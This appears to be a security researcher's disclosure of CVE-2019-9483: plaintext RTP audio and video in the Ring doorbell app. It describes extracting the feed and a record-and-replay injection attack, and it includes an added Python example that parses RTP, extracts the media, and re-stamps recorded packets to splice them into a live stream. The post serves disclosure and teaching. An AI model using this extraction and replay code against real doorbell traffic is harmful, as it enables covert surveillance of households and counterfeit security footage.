Plaintext transmission of audio/video footage to the Ring application allows for arbitrary surveillance and injection of counterfeit traffic, effectively compromising home security (CVE-2019-9483).
We then moved on to sniffing the application's own traffic. Here the signalling is handled more sensibly: SIP runs over TLS, and nearly all notifications, updates and account information travel over HTTPS. The actual RTP media, however, is sent in the clear rather than as SRTP.
The payloads are intact, well-formed RTP, so the media can simply be extracted. Using the handy videosnarf utility we get a viewable MPEG file, which means anyone who can observe the incoming packets can watch the feed. The G.711-encoded audio stream can be pulled out in the same way.
Capturing the doorbell feed is already bad enough, but why stop there when we can inject our own? We developed a proof of concept that first captures genuine footage in a so-called "recon mode". In "active mode" it then drops the genuine traffic and injects the previously captured footage in its place. The attack works smoothly and is undetectable from within the app. We demonstrated it publicly at Mobile World Congress 2019.
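To make concrete what "plain RTP" means for the extraction step and for the recon/active-mode proof of concept, here is an added Python example (not the blog's code, not videosnarf, and not Ring's protocol implementation). It parses RTP headers, demultiplexes packets by SSRC, writes out raw G.711 audio and an Annex B H.264 elementary stream, and then re-stamps a recorded stream so that it continues a live one. The packets are constructed inline as a stand-in for a sniffed session, the mapping of dynamic payload type 96 to H.264 is an assumption (in a real session it comes from the SDP offer/answer), and all function names are hypothetical.

```python
"""Demultiplex plaintext RTP into raw G.711 audio and H.264 video, then re-stamp a
recorded stream so it continues a live one. Added illustration; all packets are
constructed, nothing here is a real Ring capture."""
import struct
from collections import defaultdict

RTP_VERSION = 2
PT_PCMU, PT_PCMA = 0, 8   # static G.711 payload types (RFC 3551)
PT_H264 = 96              # dynamic PT; that it carries H.264 is an assumption (SDP decides)
ANNEXB_START = b"\x00\x00\x00\x01"


def parse_rtp(pkt: bytes) -> dict:
    """Parse an RFC 3550 header (CSRC list, extension, padding) and split off the payload."""
    if len(pkt) < 12:
        raise ValueError("short RTP packet")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", pkt[:12])
    if b0 >> 6 != RTP_VERSION:
        raise ValueError("not RTP version 2")
    offset = 12 + 4 * (b0 & 0x0F)                    # skip CSRC identifiers
    if b0 & 0x10:                                    # header extension present
        if len(pkt) < offset + 4:
            raise ValueError("truncated extension")
        offset += 4 + 4 * struct.unpack("!H", pkt[offset + 2:offset + 4])[0]
    end = len(pkt) - (pkt[-1] if b0 & 0x20 else 0)  # last byte = padding length
    if offset > end:
        raise ValueError("truncated packet")
    return {"pt": b1 & 0x7F, "marker": bool(b1 & 0x80), "seq": seq,
            "ts": ts, "ssrc": ssrc, "payload": pkt[offset:end]}


def build_rtp(pt, seq, ts, ssrc, payload, marker=False) -> bytes:
    """Build a minimal RTP packet (no CSRCs, no extension, no padding)."""
    b1 = (0x80 if marker else 0) | (pt & 0x7F)
    return struct.pack("!BBHII", RTP_VERSION << 6, b1, seq & 0xFFFF,
                       ts & 0xFFFFFFFF, ssrc & 0xFFFFFFFF) + payload


def demux(parsed) -> dict:
    """Group parsed packets by SSRC, keeping capture order."""
    streams = defaultdict(list)
    for p in parsed:
        streams[p["ssrc"]].append(p)
    return dict(streams)


def extract_g711(stream) -> bytes:
    """Concatenate G.711 payloads: one byte per 8 kHz sample, playable as-is
    (e.g. `sox -t ul -r 8000 out.ul out.wav` for PCMU)."""
    return b"".join(p["payload"] for p in stream if p["pt"] in (PT_PCMU, PT_PCMA))


def extract_h264_annexb(stream) -> bytes:
    """Rebuild an Annex B elementary stream from RFC 6184 payloads: single NAL
    unit packets (types 1-23) and FU-A fragments (28). STAP-A (24) is skipped."""
    out, frag = bytearray(), bytearray()
    for p in stream:
        pl = p["payload"]
        if p["pt"] != PT_H264 or not pl:
            continue
        nal_type = pl[0] & 0x1F
        if 1 <= nal_type <= 23:                      # single NAL unit packet
            out += ANNEXB_START + pl
        elif nal_type == 28 and len(pl) >= 2:        # FU-A fragment
            fu_hdr = pl[1]
            if fu_hdr & 0x80:                        # start bit: rebuild NAL header
                frag = bytearray([(pl[0] & 0xE0) | (fu_hdr & 0x1F)])
            frag += pl[2:]
            if fu_hdr & 0x40:                        # end bit: emit whole NAL unit
                out += ANNEXB_START + bytes(frag)
                frag = bytearray()
    return bytes(out)


def rewrite_for_replay(recorded, start_seq, start_ts, ssrc=None) -> list:
    """'Active mode' re-stamping: recorded packets continue the live stream's
    sequence numbers from start_seq and timestamps from start_ts (keeping their
    original spacing) under the same or a chosen SSRC. Plain RTP authenticates
    none of these fields, which is why the splice is invisible to the receiver;
    SRTP (RFC 3711) would reject the re-stamped packets."""
    out = []
    if not recorded:
        return out
    first_ts = recorded[0]["ts"]
    for i, p in enumerate(recorded):
        out.append(build_rtp(p["pt"], start_seq + i, start_ts + p["ts"] - first_ts,
                             p["ssrc"] if ssrc is None else ssrc,
                             p["payload"], p["marker"]))
    return out


def sample_capture() -> list:
    """Constructed stand-in for a sniffed session: three PCMU packets on SSRC
    0x11111111, an SPS and a fragmented IDR slice on SSRC 0x22222222."""
    pkts = [build_rtp(PT_PCMU, 1000 + i, 160 * i, 0x11111111, b"\xff" * 160)
            for i in range(3)]                       # 0xFF = PCMU silence
    pkts.append(build_rtp(PT_H264, 500, 9000, 0x22222222, b"\x67\x42\x00\x1e"))  # SPS
    slice_body = b"\x88\x84\x00\x33\xff"             # follows IDR NAL header 0x65
    fu_ind = (0x65 & 0xE0) | 28                      # FU indicator keeps NRI, type 28
    pkts.append(build_rtp(PT_H264, 501, 12000, 0x22222222,
                          bytes([fu_ind, 0x80 | 5]) + slice_body[:2]))
    pkts.append(build_rtp(PT_H264, 502, 12000, 0x22222222,
                          bytes([fu_ind, 0x40 | 5]) + slice_body[2:], marker=True))
    return pkts


if __name__ == "__main__":
    streams = demux(parse_rtp(p) for p in sample_capture())
    for ssrc, pkts in streams.items():
        print(f"SSRC {ssrc:08x}: {len(pkts)} packets, PT {pkts[0]['pt']}")
    print("audio bytes:", len(extract_g711(streams[0x11111111])))
    print("video (Annex B):", extract_h264_annexb(streams[0x22222222]).hex())
```

On a real capture you would feed `parse_rtp` the UDP payloads of the media port (for example from dpkt or scapy) instead of `sample_capture()`. The re-stamping function is the whole point of the exercise: because nothing in plain RTP binds the header to a key, a recorded stream only has to continue the sequence number, timestamp and SSRC of the genuine one to be accepted, whereas an SRTP receiver would fail the authentication tag on every spliced packet.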
Is it really Jesus at the door?
The possible attack scenarios are far too numerous to list, but imagine, for example, capturing an Amazon delivery and later replaying that feed: it would make for a particularly easy burglary. Spying on the doorbell also allows the gathering of sensitive information, such as household habits and the names and details of family members including children, all of which makes the target easy prey for later exploitation. Letting the "babysitter" in while the kids are at home could be a life-threatening mistake.
Are you sure about letting this killer clown in?
The main takeaway from this research is that security is only as strong as its weakest link. Encrypting the upstream RTP traffic does not make forgery any harder if the downstream traffic is not secured, and encrypting the SIP signalling does not prevent interception of the media stream it sets up. For data as sensitive as a doorbell feed, secure transport is not a feature but a must, because the average user has no way to notice tampering.
Important note: Ring patched this vulnerability in version 3.4.7 of the Ring app, without mentioning it in the release notes. Please upgrade to 3.4.7 or newer as soon as possible: the affected older versions still work with the service and therefore remain vulnerable.